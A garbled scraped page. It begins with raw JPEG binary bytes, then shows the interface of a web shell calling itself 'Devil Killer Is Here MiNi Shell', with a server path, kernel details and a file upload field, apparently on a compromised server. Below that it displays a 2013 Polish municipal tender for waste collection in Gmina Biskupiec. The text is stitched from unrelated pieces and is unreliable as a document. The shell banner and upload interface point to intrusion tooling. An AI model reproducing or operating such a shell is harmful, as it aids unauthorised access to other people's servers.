JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130619/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130619/235490-N-2013.html

<p class="kh_header"><b>Biskupiec: Odbiór i zagospodarowanie odpadów komunalnych z terenu Gminy Biskupiec</b><br>
<b>Numer ogłoszenia: 235490 - 2013; data zamieszczenia: 19.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Biskupiec , ul. Rynek 1, 13-340 Biskupiec, woj. warmińsko-mazurskie, tel. 56 4745057 do 59, faks 56 4747952.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminabiskupiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z terenu Gminy Biskupiec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
Odbiór i zagospodarowanie odpadów komunalnych tj:
-komunalne odpady niesegregowane ( zmieszanych);
-komunalne odpady selektywnie zbierane, tj. szkło i opakowanie szklane, papier i makulatura, tworzywa sztuczne, opakowania wielomateriałowe, po segregacyjne, metal oraz odzież i tekstylia  i odpady biodegradowalne w tym odpady zielone;
- przeterminowane leki i chemikalia, zużyte baterie i akumulatory, meble i inne odpady wielkogabarytowe;
-odpady komunalne remontowo-budowlane
-Inne wymienione w tabeli nr 1 załączonej do SIWZ
Odbioru odpadów komunalnych określonych w powyższych punktach należy dokonać z nieruchomości , na których zamieszkują mieszkańcy i na których nie zamieszkują mieszkańcy a wytwarzane są odpady  w granicach administracyjnych gminy Biskupiec.
Przez nieruchomości, na których zamieszkują mieszkańcy rozumie się nieruchomości wykorzystywane w całości do celów mieszkalnych oraz nieruchomości mieszkalno-użytkowe  lub użytkowo-mieszkalne w części mieszkalnej.
Nieruchomość niezamieszkała - rozumie się przez to nieruchomość nieprzeznaczoną do trwałego zamieszkania. takie jak: szkoła, pole namiotowe, działki letniskowe, cmentarze  itp. Do nieruchomości niezamieszkałych zalicza się również nieruchomości na terenie, których prowadzona jest działalność gospodarcza (np. zakład krawiecki, zakład fryzjerski, restauracja, sklep, warsztat, stolarnia  itp.)
Dane ogólne niezbędne dla Wykonawcy:
Liczba mieszkańców zameldowana na pobyt stały  - 10006 osoby- stan na 31.12.2012 r.
Powierzchnia gminy - 241 km2,
Szacunkowa liczba mieszkańców przypadająca na 1 km2  - 40 osób.
Szacunkowa liczba nieruchomości nie zamieszkałych na których powstają odpady około 400,są to: 
-	320  zarejestrowanych  działalności  gospodarczych
-	85  domków  letniskowych
-	8  szkół,  itp  
  
Szczegółowy  opis przedmiotu zamówienia zawarty  jest w załączniku  nr 9 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.12.00-4, 90.51.13.00-5, 90.51.20.00-9, 90.51.31.00-7, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Postępowanie prowadzone jest bez obowiązku wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże że jest wpisany do Rejestru Działalności Regulowanej prowadzonego przez Wójta Gminy Biskupiec.
Dla potwierdzenia spełnienia warunku posiadania uprawnień do wykonywania określonej działalności lub czynności określonym w rozdziale VI SIWZ pkt. 1.1., Wykonawca zobowiązany jest  przedłożyć w ofercie:
-wpis do Rejestru Działalności Regulowanej prowadzonego przez Wójta Gminy Biskupiec - wykonawca nie ma obowiązku złożenia ponieważ jest w zasobach zamawiającego
Ocena spełnienia warunków udziału w postępowaniu nastąpi metodą spełnia/ nie spełnia na dzień upływu terminu do składania ofert   na podstawie złożonych oświadczeń i dokumentów
Wykonawcy , którzy:
a)	nie złożą oświadczeń o spełnieniu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnienie tych warunków lub złożą dokumenty zawierające błędy, z zastrzeżeniem art.26 ust.3 ustawy - Prawo zamówień publicznych albo
b)	z przedłożonych oświadczeń i dokumentów  będzie wynikało , że nie spełniają wymaganych warunków ,zostaną wykluczeni z postępowania, a ich oferty zostaną uznane za odrzucone.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony , jeżeli wykonawca wykaże, że wykonał  lub wykonuje usługę usługi polegające na odbieraniu odpadów komunalnych selektywnie zbieranych i lub odpadów komunalnych zmieszanych na kwotę nie niższą niż 1300.000 zł netto z terenu jednej gminy o powierzchni nie mniejszej niż 200km2 oraz liczbie mieszkańców nie mniejszej niż 9500 w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , z podaniem wartości , przedmiotu, dat wykonania i odbiorców, na rzecz których usługi zostały wykonane lub są wykonywane , oraz  załączeniem dokumentów dotyczących najważniejszych usług. Dokumenty powinny określać czy usługi te zostały wykonane  lub są wykonywane w sposób należyty.
Jeżeli Wykonawca polega na wiedzy i doświadczeniu innych podmiotów zobowiązany jest udowodnić , że będzie dysponował zasobami niezbędnymi do realizacji przedmiotu zamówienia .Za dowód uznaje się pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.Ocena spełnienia warunków udziału w postępowaniu nastąpi metodą spełnia   nie spełnia na dzień upływu terminu do składania ofert   na podstawie złożonych oświadczeń i dokumentów
Wykonawcy , którzy:
a)	nie złożą oświadczeń o spełnieniu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnienie tych warunków lub złożą dokumenty zawierające błędy, z zastrzeżeniem art.26 ust.3 ustawy - Prawo zamówień publicznych albo
b)	z przedłożonych oświadczeń i dokumentów  będzie wynikało , że nie spełniają wymaganych warunków ,zostaną wykluczeni z postępowania, a ich oferty zostaną uznane za odrzucone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony , jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował  co najmniej :
wymagane ilości i rodzaje pojazdów:
1. Dla odpadów zmieszanych i odpadów sortowniczych: co najmniej dwoma pojazdami przystosowanymi do odbioru odpadów zmieszanych z mechanizmem załadowczym - śmieciarka; bezpyle; o dopuszczalnej masie całkowitej powyżej 3,5 t; spęłniającymi wymagania Euro II lub wyższe
2. Dla odpadów selektywnie zebranych (papier i makulatura, metale, tworzywa sztuczne, opakowania wielomateriałowe, odzież i tekstylia, szkło, odpady ulegające biodegradacji) - co najmniej dwoma pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych z mechanizmem załadowczym - śmieciarka, bezpyle, o dopuszczalnej masie całkowitej powyżej 3,5 t.
3. Dla wielkogabarytowych, zielonych, budowlanych i rozbiórkowych: 1) dwoma samochodami dostawczymi o dopuszczalnej masie całkowitej do 3,5 t każdy; 2) jednym ciągnikiem z przyczepą o ladowności minimalnej 3,5 t; 3) jedn ładowarką o pojemności łyżki roboczej minimalnej 1,0m3
Wymagania dla zastosowanych przy realizacji przedmiotu zamówienia pojazdów:
a) pojazdy muszą być  trwale i czytelnie oznakowane, w widocznym miejscu, nazwą firmy oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne od właścicieli nieruchomości;
b)pojazdy muszą posiadać aktualne badania techniczne i świadectwa dopuszczenia do ruchu zgodnie z obowiązującymi przepisami o ruchu drogowym;
c)  pojazdy i urządzenia  muszą być utrzymywane  w należytym stanie technicznym i sanitarnym;
d) pojazdy i urządzenia muszą być poddawane myciu i dezynfekcji tak często, aby zapewnić właściwy stan sanitarny , jednakże nie rzadziej niż raz na miesiąc, a w okresie letnim nie rzadziej niż raz na dwa tygodnie. Wykonawca zobowiązany jest do prowadzenia i przechowywania przez okres 5 lat od  dnia rozpoczęcia realizacji przedmiotu zamówienia dokumentacji w zakresie informacji o stosowanych środkach dezynfekujących oraz o częstotliwości wykonywanej dezynfekcji pojazdów i urządzeń;
e)pojazdy i urządzenia muszą być zabezpieczone przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas  transportu oraz muszą być zabezpieczone przed rozwiewaniem , rozpylaniem przewożonych odpadów a także przed wpływem oddziaływania czynników atmosferycznych na odpady;
f) pojazdy muszą być wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników;
g) pojazdy wskazane do realizacji przedmiotu zamówienia muszą być przez cały okres realizacji przedmiotu zamówienia  wyposażone w system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiającego trwałe zapisywanie , przechowywanie i odczytywanie danych o położeniu pojazdów i miejscach ich postoju oraz wyposażone w czujniki zapisujące dane o miejscach wyładunku odpadów; system monitorowania pracy sprzętu obejmować musi między innymi: bieżące śledzenie pozycji pojazdów w oparciu o wykorzystanie systemu GPS i komunikowanie się z nimi w dowolnym momencie w celu odczytu ww. danych; pamięć danych powinna być przechowywana i odczytywalna minimum przez okres 30 dni, przy czym odczytanie danych nie może powodować kasowania zawartości pamięci urządzenia monitorującego
 Wykonawca musi posiadać bazę transportową usytuowaną na terenie gminy Biskupiec  lub w odległości nie większej niż 60 km od granicy tej gminy. Wykonawca musi  posiadać tytuł prawny do terenu na którym znajduje się baza transportowa. Baza transportowa musi spełniać warunki określone w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości -Dz. U. z 2013 r, poz.122.
Jeżeli Wykonawca polega na potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów zobowiązany jest udowodnić , że będzie dysponował zasobami niezbędnymi do realizacji przedmiotu zamówienia .Za dowód uznaje się pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Oddany do dyspozycji przez inny podmiot  potencjał techniczny musi spełniać wymogi określone niniejszą SIWZ.
Dla potwierdzenia spełnienia warunku posiadania wiedzy i doświadczenia określonym w rozdziale VI SIWZ pkt. 1.2., Wykonawca zobowiązany  jest przedłożyć w ofercie:
-Wykaz zrealizowanych lub realizowanych głównych usług w ciągu ostatnich trzech lat  przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wg wzoru załącznika nr 2 SIWZ  Doświadczenie Zawodowe  - wraz z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, na rzecz  których usługi zostały wykonane lub wykonywane wraz z załączeniem dowodów najważniejszych usług, czy zostały one wykonane lub są wykonywane należycie. Dowody mogą stanowić: poświadczenia, oświadczenia dołączone do oferty
Uwaga I:  W przypadku gdy zamawiający -  Gmina Biskupiec jest podmiotem , na rzecz którego usługi  odbioru odpadów komunalnych zostały wcześniej wykonane, Wykonawca nie ma obowiązku przekładania dowodów , o których mowa powyżej.
Uwaga II Zamawiający dopuszcza w miejsce poświadczeń przedłożenia w ofercie dokumentów potwierdzających należyte wykonanie lub wykonywanie usług np. referencje zgodnie z Rozporządzeniem Rady Ministrów z 30.12.2009 r w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz.U.Nr 226, poz.1817).
Jeżeli Wykonawca polega na wiedzy i doświadczeniu innych podmiotów należy przedłożyć w oryginale pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.Oddany do dyspozycji przez inny podmiot  potencjał techniczny musi spełniać wymogi określone niniejszą SIWZ.
Ocena spełnienia warunków udziału w postępowaniu nastąpi metodą spełnia/ nie spełnia na dzień upływu terminu do składania ofert   na podstawie złożonych oświadczeń i dokumentów
Wykonawcy , którzy:
a)	nie złożą oświadczeń o spełnieniu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnienie tych warunków lub złożą dokumenty zawierające błędy, z zastrzeżeniem art.26 ust.3 ustawy - Prawo zamówień publicznych albo
b)	z przedłożonych oświadczeń i dokumentów  będzie wynikało , że nie spełniają wymaganych warunków ,zostaną wykluczeni z postępowania, a ich oferty zostaną uznane za odrzucone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony , jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował  co najmniej :
Wymagania dla zastosowanych przy realizacji przedmiotu zamówienia pojazdów:
a) pojazdy muszą być  trwale i czytelnie oznakowane, w widocznym miejscu, nazwą firmy oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne od właścicieli nieruchomości;
b)pojazdy muszą posiadać aktualne badania techniczne i świadectwa dopuszczenia do ruchu zgodnie z obowiązującymi przepisami o ruchu drogowym;
c)  pojazdy i urządzenia  muszą być utrzymywane  w należytym stanie technicznym i sanitarnym;
d) pojazdy i urządzenia muszą być poddawane myciu i dezynfekcji tak często, aby zapewnić właściwy stan sanitarny , jednakże nie rzadziej niż raz na miesiąc, a w okresie letnim nie rzadziej niż raz na dwa tygodnie. Wykonawca zobowiązany jest do prowadzenia i przechowywania przez okres 5 lat od  dnia rozpoczęcia realizacji przedmiotu zamówienia dokumentacji w zakresie informacji o stosowanych środkach dezynfekujących oraz o częstotliwości wykonywanej dezynfekcji pojazdów i urządzeń;
e)pojazdy i urządzenia muszą być zabezpieczone przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas  transportu oraz muszą być zabezpieczone przed rozwiewaniem , rozpylaniem przewożonych odpadów a także przed wpływem oddziaływania czynników atmosferycznych na odpady;
f) pojazdy muszą być wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników;
g) pojazdy wskazane do realizacji przedmiotu zamówienia muszą być przez cały okres realizacji przedmiotu zamówienia  wyposażone w system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiającego trwałe zapisywanie , przechowywanie i odczytywanie danych o położeniu pojazdów i miejscach ich postoju oraz wyposażone w czujniki zapisujące dane o miejscach wyładunku odpadów; system monitorowania pracy sprzętu obejmować musi między innymi: bieżące śledzenie pozycji pojazdów w oparciu o wykorzystanie systemu GPS i komunikowanie się z nimi w dowolnym momencie w celu odczytu ww. danych; pamięć danych powinna być przechowywana i odczytywalna minimum przez okres 30 dni, przy czym odczytanie danych nie może powodować kasowania zawartości pamięci urządzenia monitorującego
-Wykonawca musi posiadać bazę transportową usytuowaną na terenie gminy Biskupiec  lub w odległości nie większej niż 60 km od granicy tej gminy. Wykonawca musi  posiadać tytuł prawny do terenu na którym znajduje się baza transportowa. Baza transportowa musi spełniać warunki określone w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości -Dz. U. z 2013 r, poz.122.
Jeżeli Wykonawca polega na potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów zobowiązany jest udowodnić , że będzie dysponował zasobami niezbędnymi do realizacji przedmiotu zamówienia .Za dowód uznaje się pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Oddany do dyspozycji przez inny podmiot  potencjał techniczny musi spełniać wymogi określone niniejszą SIWZ. 
Dla potwierdzenia spełnienia warunku dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia określonym w rozdziale VI SIWZ pkt. 1.3. Wykonawca zobowiązany  jest przedłożyć w ofercie:
1.3.1.wykaz narzędzi, wyposażenia wykonawcy i urządzeń technicznych dostępnych wykonawcy usług w celu wykonania zamówienia wraz  informacją o podstawie do dysponowania tymi zasobami -wg wzoru załącznika nr 3 SIWZ  Potencjał Techniczny 
1.3.2.oświadczenie , że osoby, które będą uczestniczyć w wykonywaniu zamówienia , posiadają wymagane uprawnienia , jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - wg wzoru załącznika nr 5 SIWZ;
Jeżeli Wykonawca polega na potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów zobowiązany jest przedłożyć w ofercie  pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Oddany do dyspozycji przez inny podmiot  potencjał techniczny musi spełniać wymogi określone niniejszą SIWZ.Ocena spełnienia warunków udziału w postępowaniu nastąpi metodą spełnia/ nie spełnia na dzień upływu terminu do składania ofert   na podstawie złożonych oświadczeń i dokumentów
Wykonawcy , którzy:
a)	nie złożą oświadczeń o spełnieniu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnienie tych warunków lub złożą dokumenty zawierające błędy, z zastrzeżeniem art.26 ust.3 ustawy - Prawo zamówień publicznych albo
b)	z przedłożonych oświadczeń i dokumentów  będzie wynikało , że nie spełniają wymaganych warunków ,zostaną wykluczeni z postępowania, a ich oferty zostaną uznane za odrzucone.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia.
Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić  zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia;Dla potwierdzenia spełnienia warunku sytuacji ekonomicznej i finansowej określonym w rozdziale VI SIWZ pkt. 1.4. Wykonawca zobowiązany  jest przedłożyć w ofercie:
- opłaconą polisę , a w przypadku jej braku innego dokumentu potwierdzającego , że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia Ocena spełnienia warunków udziału w postępowaniu nastąpi metodą spełnia/ nie spełnia na dzień upływu terminu do składania ofert   na podstawie złożonych oświadczeń i dokumentów
Wykonawcy , którzy:
a)	nie złożą oświadczeń o spełnieniu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnienie tych warunków lub złożą dokumenty zawierające błędy, z zastrzeżeniem art.26 ust.3 ustawy - Prawo zamówień publicznych albo
b)	z przedłożonych oświadczeń i dokumentów  będzie wynikało , że nie spełniają wymaganych warunków ,zostaną wykluczeni z postępowania, a ich oferty zostaną uznane za odrzucone.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający uzna warunek za spełniony , jeżeli wykonawca wykaże, że wykonał  lub wykonuje usługę usługi polegające na odbieraniu odpadów komunalnych selektywnie zbieranych i lub odpadów komunalnych zmieszanych na kwotę nie niższą niż 1300.000 zł netto z terenu jednej gminy o powierzchni nie mniejszej niż 200km2 oraz liczbie mieszkańców nie mniejszej niż 9500 w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , z podaniem wartości , przedmiotu, dat wykonania i odbiorców, na rzecz których usługi zostały wykonane lub są wykonywane , oraz  załączeniem dokumentów dotyczących najważniejszych usług. Dokumenty powinny określać czy usługi te zostały wykonane  lub są wykonywane w sposób należyty.
Jeżeli Wykonawca polega na wiedzy i doświadczeniu innych podmiotów zobowiązany jest udowodnić , że będzie dysponował zasobami niezbędnymi do realizacji przedmiotu zamówienia .Za dowód uznaje się pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

